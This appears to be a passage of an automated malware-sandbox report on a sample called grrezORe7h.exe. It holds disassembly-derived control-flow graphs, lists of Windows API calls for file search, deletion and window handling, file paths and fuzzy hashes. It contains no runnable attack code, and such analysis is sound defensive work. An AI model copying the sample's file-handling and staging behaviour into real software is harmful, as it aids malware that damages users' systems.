                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                      • String ID: $M$N
                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                      • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                      • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                      • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                      • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4227406936-0
                                                                                                                      • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                      • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                      • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                      • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 700 406077-406082 701 406084-406093 700->701 702 406095-4060ab 700->702 701->702 703 4060b1-4060be 702->703 704 4062c3-4062c9 702->704 703->704 707 4060c4-4060cb 703->707 705 4060d0-4060dd 704->705 706 4062cf-4062da 704->706 705->706 710 4060e3-4060ef 705->710 708 4062e5-4062e6 706->708 709 4062dc-4062e0 call 406055 706->709 707->704 709->708 712 4062b0 710->712 713 4060f5-406131 710->713 714 4062b2-4062bc 712->714 715 4062be-4062c1 712->715 716 406251-406255 713->716 717 406137-406142 GetVersion 713->717 714->704 715->704 718 406257-40625b 716->718 719 40628a-40628e 716->719 720 406144-406148 717->720 721 40615c 717->721 722 40626b-406278 call 406055 718->722 723 40625d-406269 call 405f9c 718->723 725 406290-406298 call 406077 719->725 726 40629d-4062ae lstrlenW 719->726 720->721 727 40614a-40614e 720->727 724 406163-40616a 721->724 738 40627d-406286 722->738 723->738 730 40616c-40616e 724->730 731 40616f-406171 724->731 725->726 726->704 727->721 728 406150-406154 727->728 728->721 734 406156-40615a 728->734 730->731 736 406173-406199 call 405f22 731->736 737 4061ad-4061b0 731->737 734->724 748 406238-40623c 736->748 749 40619f-4061a8 call 406077 736->749 741 4061c0-4061c3 737->741 742 4061b2-4061be GetSystemDirectoryW 737->742 738->726 740 406288 738->740 744 406249-40624f call 4062e9 740->744 746 4061c5-4061d3 GetWindowsDirectoryW 741->746 747 40622e-406230 741->747 745 406232-406236 742->745 744->726 745->744 745->748 746->747 747->745 750 4061d5-4061df 747->750 748->744 755 40623e-406244 lstrcatW 748->755 749->745 752 4061e1-4061e4 750->752 753 4061f9-40620f SHGetSpecialFolderLocation 750->753 752->753 757 4061e6-4061ed 752->757 758 406211-406228 SHGetPathFromIDListW CoTaskMemFree 753->758 759 40622a 753->759 755->744 761 4061f5-4061f7 757->761 758->745 758->759 759->747 761->745 761->753
                                                                                                                      APIs
                                                                                                                      • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                      • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                      • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                      • API String ID: 900638850-1230650788
                                                                                                                      • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                      • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                      • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                      • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 762 405846-40586c call 405b11 765 405885-40588c 762->765 766 40586e-405880 DeleteFileW 762->766 768 40588e-405890 765->768 769 40589f-4058af call 406055 765->769 767 405a02-405a06 766->767 770 4059b0-4059b5 768->770 771 405896-405899 768->771 777 4058b1-4058bc lstrcatW 769->777 778 4058be-4058bf call 405a55 769->778 770->767 774 4059b7-4059ba 770->774 771->769 771->770 775 4059c4-4059cc call 406398 774->775 776 4059bc-4059c2 774->776 775->767 786 4059ce-4059e2 call 405a09 call 4057fe 775->786 776->767 780 4058c4-4058c8 777->780 778->780 782 4058d4-4058da lstrcatW 780->782 783 4058ca-4058d2 780->783 785 4058df-4058fb lstrlenW FindFirstFileW 782->785 783->782 783->785 787 405901-405909 785->787 788 4059a5-4059a9 785->788 802 4059e4-4059e7 786->802 803 4059fa-4059fd call 4051b4 786->803 790 405929-40593d call 406055 787->790 791 40590b-405913 787->791 788->770 793 4059ab 788->793 804 405954-40595f call 4057fe 790->804 805 40593f-405947 790->805 794 405915-40591d 791->794 795 405988-405998 FindNextFileW 791->795 793->770 794->790 798 40591f-405927 794->798 795->787 801 40599e-40599f FindClose 795->801 798->790 798->795 801->788 802->776 807 4059e9-4059f8 call 4051b4 call 405ef6 802->807 803->767 813 405980-405983 call 4051b4 804->813 814 405961-405964 804->814 805->795 808 405949-405952 call 405846 805->808 807->767 808->795 813->795 817 405966-405976 call 4051b4 call 405ef6 814->817 818 405978-40597e 814->818 817->795 818->795
                                                                                                                      APIs
                                                                                                                      • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 0040586F
                                                                                                                      • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 004058B7
                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 004058DA
                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 004058E0
                                                                                                                      • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 004058F0
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                                      • \*.*, xrefs: 004058B1
                                                                                                                      • "C:\Users\user\Desktop\grrezORe7h.exe", xrefs: 0040584F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                      • String ID: "C:\Users\user\Desktop\grrezORe7h.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                      • API String ID: 2035342205-2617296150
                                                                                                                      • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                      • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                      • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                      • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets, xrefs: 00402154
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInstance
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets
                                                                                                                      • API String ID: 542301482-3638503147
                                                                                                                      • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                      • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                                                                                                      • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                      • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNELBASE(74DF3420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2295610775-0
                                                                                                                      • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                      • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                                                                                                      • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                      • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFindFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1974802433-0
                                                                                                                      • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                      • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                                                                                                      • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                      • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 265 403c70-403c7d SetWindowPos 260->265 266 403c83-403c86 260->266 263 403e47-403e4c call 404165 261->263 264 403e09-403e0c 261->264 262->261 276 403e51-403e6c 263->276 268 403e0e-403e19 call 401389 264->268 269 403e3f-403e41 264->269 265->266 271 403ca0-403ca6 266->271 272 403c88-403c9a ShowWindow 266->272 268->269 290 403e1b-403e3a SendMessageW 268->290 269->263 275 4040e6 269->275 277 403cc2-403cc5 271->277 278 403ca8-403cbd DestroyWindow 271->278 272->271 283 4040e8-4040ef 275->283 281 403e75-403e7b 276->281 282 403e6e-403e70 call 40140b 276->282 286 403cc7-403cd3 SetWindowLongW 277->286 287 403cd8-403cde 277->287 284 4040c3-4040c9 278->284 293 403e81-403e8c 281->293 294 4040a4-4040bd DestroyWindow EndDialog 281->294 282->281 284->275 291 4040cb-4040d1 284->291 286->283 288 403d81-403d8f call 404180 287->288 289 403ce4-403cf5 GetDlgItem 287->289 288->283 295 403d14-403d17 289->295 296 403cf7-403d0e SendMessageW IsWindowEnabled 289->296 290->283 291->275 298 4040d3-4040dc ShowWindow 291->298 293->294 299 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 293->299 294->284 300 403d19-403d1a 295->300 301 403d1c-403d1f 295->301 296->275 296->295 298->275 327 403ee1-403ee6 299->327 328 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 299->328 304 403d4a-403d4f call 4040f2 300->304 305 403d21-403d27 301->305 306 403d2d-403d32 301->306 304->288 309 403d68-403d7b SendMessageW 305->309 310 403d29-403d2b 305->310 306->309 311 403d34-403d3a 306->311 309->288 310->304 315 403d51-403d5a call 40140b 311->315 316 403d3c-403d42 call 40140b 311->316 315->288 324 403d5c-403d66 315->324 325 403d48 316->325 324->325 325->304 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->276 345 403fb9-403fbb 336->345 345->276 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->284 350 403ffe-40402b CreateDialogParamW 347->350 348->275 349 403fd3-403fd9 348->349 349->276 351 403fdf 349->351 350->284 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->275 352->275 357 40408a-4040a2 ShowWindow call 404165 352->357 357->284
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                      • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                      • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                                                                                                      • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                      • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                      • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3282139019-0
                                                                                                                      • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                      • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                      • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                      • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 379 40395e-403986 call 405f22 377->379 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 379->378 386 403988-40398c 379->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 390 40399e-4039aa lstrlenW 386->390 391 40398e-40399b call 405a36 386->391 402 403aa5-403aa8 388->402 403 403aad-403ab8 call 403b74 388->403 392 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->392 393 403b6a 389->393 397 4039d2-4039da call 405a09 call 406055 390->397 398 4039ac-4039ba lstrcmpiW 390->398 391->390 392->388 396 403b6c-403b73 393->396 397->378 398->397 401 4039bc-4039c6 GetFileAttributesW 398->401 405 4039c8-4039ca 401->405 406 4039cc-4039cd call 405a55 401->406 402->396 412 403b41-403b49 call 405287 403->412 413 403abe-403ad8 ShowWindow call 4063bf 403->413 405->397 405->406 406->397 420 403b63-403b65 call 40140b 412->420 421 403b4b-403b51 412->421 418 403ae4-403af6 GetClassInfoW 413->418 419 403ada-403adf call 4063bf 413->419 425 403af8-403b08 GetClassInfoW RegisterClassW 418->425 426 403b0e-403b31 DialogBoxParamW call 40140b 418->426 419->418 420->393 421->402 422 403b57-403b5e call 40140b 421->422 422->402 425->426 430 403b36-403b3f call 4037ee 426->430 430->396
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                        • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 004038B8
                                                                                                                        • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                      • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 0040391F
